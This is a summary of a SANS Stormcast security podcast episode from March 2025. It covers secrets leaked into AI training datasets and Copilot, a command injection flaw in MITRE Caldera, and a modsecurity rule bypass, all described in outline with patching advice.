SANS Stormcast Daily Cyber Security Podcast
Episode: March 3, 2025: AI Training Data Leaks; MITRE Caldera Vuln; modsecurity bypass
Host: Johannes B. Ullrich
Location: Recording from Baltimore, Maryland
Overview
In this brisk episode, Johannes B. Ullrich delivers a rundown of recent, high-impact stories in information security. The main themes revolve around the persistent risks of sensitive data leaks through AI training datasets, specific vulnerabilities in popular security tools like MITRE Caldera and modsecurity, and the implications for practitioners and organizations.
Key Discussion Points & Insights
1. AI Training Data Leaks: Truffle Security, Trufflehog, and Common Crawl
[00:28 - 03:07]
-
Truffle Security Research:
Truffle Security (makers of Trufflehog) analyzed Common Crawl’s massive web archive (~400TB).- They discovered about 12,000 ‘live’ API keys and secrets exposed in past and present dataset versions.
- Trufflehog confirms if credentials are still active, not just expired or sample credentials.
-
Historic Exposure Issues:
Common Crawl archives about a decade of web data, so even old and once-leaked information remains accessible.- "From my own experience, particularly for a smaller website, the vast majority of sort of hits you get is crawlers like this." — Johannes B. Ullrich [02:28]
-
Supply Chain Connection:
Many exposed secrets appear across multiple sites, implying shared supplier code or JavaScript, not just demo keys. -
Security Takeaway:
If sensitive keys or credentials were ever publicly exposed, even temporarily, "assume it got captured by someone." [02:40]
2. AI Training from Private GitHub Repositories: Lasso Security Findings
[03:08 - 04:32]
-
GitHub Copilot Issue:
Research from Lasso Security found that Copilot’s AI training data includes content from now-private repositories if they were public at any time.- Copilot does not remove a repo’s data from its models after it is made private.
-
Security & Privacy Implication:
There are "literally thousands of these repositories" (including those from big-brand companies) exposed in this way.- Worse, using prompts, users can query Copilot for "a list of files in that particular repository." [03:52]
-
Main Message:
Any data public, even briefly, may remain in third-party datasets indefinitely and should be considered leaked.
3. MITRE Caldera Vulnerability: Command Injection
[04:33 - 05:37]
-
Background:
MITRE Caldera is a framework for simulating adversarial (red team) attacks. -
Vulnerability:
- Affecting Manx and Sandcat agents, which can be compiled just-in-time for specific platforms, allowing parameterized actions.
- An attacker can inject compile parameters, leading to arbitrary code execution — i.e., command injection.
-
Risk Perspective:
- Vulnerability affects an attack simulation tool, meant to allow code execution for red teamers, but should restrict this to authenticated users.
- Not likely to be widely exploited, but a serious risk for targeted attacks or insider misuse.
-
Remediation:
MITRE published a detailed postmortem and a proof-of-concept exploit. Prompt updates are recommended.
4. modsecurity Bypass Vulnerability
[05:38 - End (~06:10)]
-
Details:
A specific modsecurity version bug allows bypassing rules by prepending HTML-encoded values with zeros. -
Severity:
- Not deeply severe for every deployment, but "it does allow bypassing of modsecurity rules, and since that's the point of modsecurity, it sort of invalidates the tool somewhat." — Johannes B. Ullrich [05:55]
- Only impacts one version; review and update as necessary.
Notable Quotes & Moments
-
On crawler exposure:
“From my own experience, particularly for a smaller website, the vast majority of sort of hits you get is crawlers like this. So no real big surprise if these credentials end up pretty quickly in repositories like this common crawl and can then easily be abused.”
— Johannes B. Ullrich [02:28] -
On AI training data permanence:
“If at any point in time your data was exposed, assume it got crapped by someone and well, has to be considered leaked at this point.”
— Johannes B. Ullrich [04:20] -
On the modsecurity vulnerability’s irony:
“It does allow bypassing of modsecurity rules, and since that's the point of modsecurity, it sort of invalidates the tool somewhat.”
— Johannes B. Ullrich [05:55]
Timestamps for Key Segments
- 00:28: Start of AI training data leak discussion (Truffle Security, Common Crawl)
- 02:40: Security takeaway about exposure permanence
- 03:08: Lasso Security’s GitHub Copilot findings
- 04:33: MITRE Caldera vulnerability
- 05:38: modsecurity bypass vulnerability discussed
Takeaway
This concise episode spotlights the persistent nature of sensitive data leaks in AI and public datasets, and exposes the complexities of modern security tooling and frameworks. The reminders are clear: Anything public, even briefly, may be permanently accessible; and robust review and patching remain essential in both defense and attack simulation contexts.
